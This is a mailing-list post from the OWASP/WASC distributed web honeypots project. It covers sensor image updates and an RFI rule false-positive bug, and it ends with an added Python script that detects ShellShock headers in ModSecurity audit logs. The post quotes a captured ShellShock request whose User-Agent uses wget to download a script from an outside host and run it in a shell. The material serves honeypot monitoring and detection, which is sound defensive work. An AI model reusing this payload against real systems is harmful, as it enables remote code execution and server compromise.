[Owasp_wasc_distributed_web_honeypots_project] Sensor Updates

Ryan Barnett ryan.barnett at owasp.org
Mon Apr 6 14:19:20 UTC 2015


Greetings everyone,
A quick update on the Sensor images -
1. We had a project participant (thanks Pin-Ren Chiou) convert the VMware
image to an OVF format -
http://projects.webappsec.org/w/file/fetch/94775630/Owasp-honeypot-v1-OVF.zip?force_download=1.  If you would prefer to use a different virtual tool
than VMware, then you might want to try this image.
2. For those of you who have logged into the central AuditConsole – you will
note that we are having some issues with a false positive bug in one of our
RFI rules.  This is due to a bug in the use of the SecRuleUpdateActionById
directive used in the honeypot_end.conf file where we are trying to
dynamically modify the existing OWASP CRS RFI rules so that they will fire
off curl scripts to go and download the remote RFI payloads.  In this case,
the rule is breaking since we did not add in the “chain” action.  As a
result, you are seeing almost all transactions get flagged with the RFI
950120 ID alert.  We have since disabled this rule in our Git repo -
https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/owasp-honeypots/rules/REQUEST-31-APPLICATION-ATTACK-RFI.conf#L84-104.  The Sensors are
configured to pull from this repo everyday at midnight.  Please take a look
and verify that the rules you have match up with the Git repo and also check
that the Apache process has restarted (/etc/init.d/wasc-honeypot restart).
Despite these False Positives in labeling, it is important to remember that
ALL traffic is suspect by nature in these honeypots so there is still
valuable intel to identify.  I was just looking through some events this
morning and found 4 different BASH ENV (ShellShock) attack attempts.  I used
this “Add Filter” rule -

RULE_ID
@eq
2100080

Here is one example attack -
--VSJ8mX8AAQEAAAzYDywAAAAE-A--
[06/Apr/2015:12:31:22 +0000] VSJ8mX8AAQEAAAzYDywAAAAE 114.32.151.201 50269
192.168.0.222 8080
--VSJ8mX8AAQEAAAzYDywAAAAE-B--
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.php /tmp/S0.sh && /bin/mkdir -p
/share/HDB_DATA/.../ && /usr/bin/wget -c http://x3q.altervista.org/gH/S0.php
-O /tmp/S0.sh && /bin/sh /tmp/S0.sh && sh S0.php 0<&1 2>&1   &

It looks like these domains/IP are down and/or not allowing connections so
these S0.php files might have been moved to other locations.  These are
typically similar to RFI attacks that are trying to install either webshells
or IRC botnet scripts.  If anyone gets ahold of the S0.php file from these
attacks, please share details with the team.

Thanks,
Ryan
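Detection logic for the ShellShock attempts described above, added here as an example that is not part of Ryan's post or the project's sensor code: it parses the serial ModSecurity audit-log format shown (the `--ID-A--` / `--ID-B--` section markers) and reports any request header whose value starts a Bash function definition. The log entries are constructed samples using documentation IP addresses, and a harmless command stands in for the real payload.

```python
import re

# Constructed sample in ModSecurity serial audit-log format (not a real capture).
# Section A is the transaction summary, section B the request line and headers.
SAMPLE_AUDIT_LOG = """\
--aaaaaaaaaaaaaaaaaaaaaaaa-A--
[06/Apr/2015:12:31:22 +0000] aaaaaaaaaaaaaaaaaaaaaaaa 198.51.100.7 50269 192.0.2.10 8080
--aaaaaaaaaaaaaaaaaaaaaaaa-B--
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/true
--bbbbbbbbbbbbbbbbbbbbbbbb-A--
[06/Apr/2015:12:35:01 +0000] bbbbbbbbbbbbbbbbbbbbbbbb 203.0.113.9 41022 192.0.2.10 8080
--bbbbbbbbbbbbbbbbbbbbbbbb-B--
GET /index.html HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; example-scanner)
"""
SECTION_RE = re.compile(r"^--([A-Za-z0-9@-]+)-([A-Z])--$")
# Bash function-definition prefix that ShellShock (BASH ENV) payloads start with.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

def parse_audit_log(text):
    """Return [(tx_id, {section_letter: [lines]})] from a serial-format audit log."""
    txs, sections, letter = [], None, None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            tx_id, letter = m.groups()
            if not txs or txs[-1][0] != tx_id:  # a new transaction starts
                sections = {}
                txs.append((tx_id, sections))
            sections[letter] = []
        elif letter is not None:
            sections[letter].append(line)
    return txs

def find_shellshock(text):
    """Return (tx_id, client_ip, header_name) for each header carrying a ShellShock prefix."""
    hits = []
    for tx_id, sections in parse_audit_log(text):
        fields = sections.get("A", [""])[0].split()  # [ts tz] id client cport server sport
        client_ip = fields[3] if len(fields) > 3 else "?"
        for line in sections.get("B", [])[1:]:  # skip the request line itself
            name, sep, value = line.partition(":")
            if sep and SHELLSHOCK_RE.search(value):
                hits.append((tx_id, client_ip, name.strip()))
    return hits
```

Point `find_shellshock` at the contents of the sensor's audit log to get a per-transaction list of offending headers, independent of which CRS rule id happened to fire.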

